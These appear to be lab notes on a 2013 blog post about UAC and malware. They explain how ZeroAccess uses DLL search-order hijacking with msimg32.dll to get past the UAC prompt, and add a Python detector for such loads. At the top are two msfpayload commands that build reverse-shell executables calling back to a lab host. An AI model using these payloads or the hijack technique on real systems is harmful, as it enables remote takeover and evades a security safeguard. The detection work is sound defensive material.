http://journeyintoir.blogspot.tw/2013/03/uac-impact-on-malware.html
msfpayload windows/shell_reverse_tcp LHOST=192.168.71.128 LPORT=4444 X >./msimg32.exe
Generates a reverse-shell exe, using the X parameter.
msfpayload windows/shell_reverse_tcp LHOST=192.168.71.128 LPORT=4444 D >./msimg32.dll
Generates a reverse-shell DLL, using the D parameter.
msimg32.dll in the Temp directory was loaded before the legitimate DLL in the System32 directory.
This DLL gets loaded by InstallFlashPlayer.exe, so that's UAC bypassed.
ZeroAccess disguises itself by forcing the UAC popup to appear to come from a different, benign-seeming program. A clean copy of the Adobe Flash Installer (InstallFlashPlayer.exe) is dropped to a temporary directory and the DLL load order of Windows is abused to ensure that ZeroAccess is loaded into the clean file’s process address space when it is executed.
By dropping a DLL called msimg32.dll (one of the DLLs that InstallFlashPlayer.exe imports) into the same directory as the Flash installer file, Windows will load this DLL in preference to the genuine msimg32.dll because Windows looks in the current directory before the system directory when loading DLLs.
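The load-order abuse described above leaves a clear trace in image-load telemetry: a DLL whose name belongs in System32 gets mapped from the installer's own directory instead. The following is an added detection example, not code from the original post or from any ZeroAccess analysis. It assumes image-load records shaped like Sysmon Event ID 7 (the Image, ImageLoaded and Signed fields) and a baseline set of system DLL names (here only msimg32.dll, taken from the post); the sample records are constructed.

```python
"""Flag DLL search-order hijacking from image-load records.

Added example (not from the original post). Assumes Sysmon Event ID 7 style
fields and a baseline of DLL names that should only resolve to System32.
"""
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Where system DLLs legitimately live (assumption: default Windows install paths).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# DLL names that should only ever resolve to the system directory. The post
# names msimg32.dll; in practice this set is built by baselining a clean host.
SYSTEM_DLL_NAMES = {"msimg32.dll"}


@dataclass
class ImageLoad:
    """One image-load record, shaped like Sysmon Event ID 7 fields."""
    process_image: str   # Image: the executable that performed the load
    image_loaded: str    # ImageLoaded: full path of the DLL that was mapped
    signed: bool         # Signed: whether the DLL had a valid Authenticode signature


def _norm(path: str) -> str:
    # Normalise separators and case so path comparisons are reliable.
    return path.replace("/", "\\").lower()


def classify(rec: ImageLoad) -> Optional[str]:
    """Return a reason string if the load looks like search-order hijacking, else None."""
    dll = _norm(rec.image_loaded)
    name = ntpath.basename(dll)
    if name not in SYSTEM_DLL_NAMES:
        return None
    if dll.startswith(SYSTEM_DIRS):
        return None  # resolved to the genuine copy; nothing to report
    reasons = [f"{name} loaded from outside the system directory"]
    if ntpath.dirname(dll) == ntpath.dirname(_norm(rec.process_image)):
        # The application directory is searched before System32, which is
        # exactly what the post describes being abused.
        reasons.append("DLL sits beside the loading executable")
    if "\\temp\\" in dll:
        reasons.append("loaded from a Temp directory")
    if not rec.signed:
        reasons.append("DLL is unsigned")
    return "; ".join(reasons)


def scan(records: List[ImageLoad]) -> List[Tuple[str, str, str]]:
    """Run classify() over a batch and return (process, dll, reason) hits."""
    hits = []
    for rec in records:
        reason = classify(rec)
        if reason:
            hits.append((rec.process_image, rec.image_loaded, reason))
    return hits


# Constructed sample records (not real telemetry): one clean load, one hijack.
SAMPLE = [
    ImageLoad(r"C:\Users\bob\AppData\Local\Temp\InstallFlashPlayer.exe",
              r"C:\Windows\System32\msimg32.dll", True),
    ImageLoad(r"C:\Users\bob\AppData\Local\Temp\InstallFlashPlayer.exe",
              r"C:\Users\bob\AppData\Local\Temp\msimg32.dll", False),
]

if __name__ == "__main__":
    for proc, dll, why in scan(SAMPLE):
        print(f"ALERT {proc} -> {dll}: {why}")
```

Only the second record is reported: the genuine System32 load passes, while the copy dropped beside the installer in Temp trips all three secondary indicators. Feeding real Sysmon output through the same classify() call is a matter of mapping the event fields onto ImageLoad.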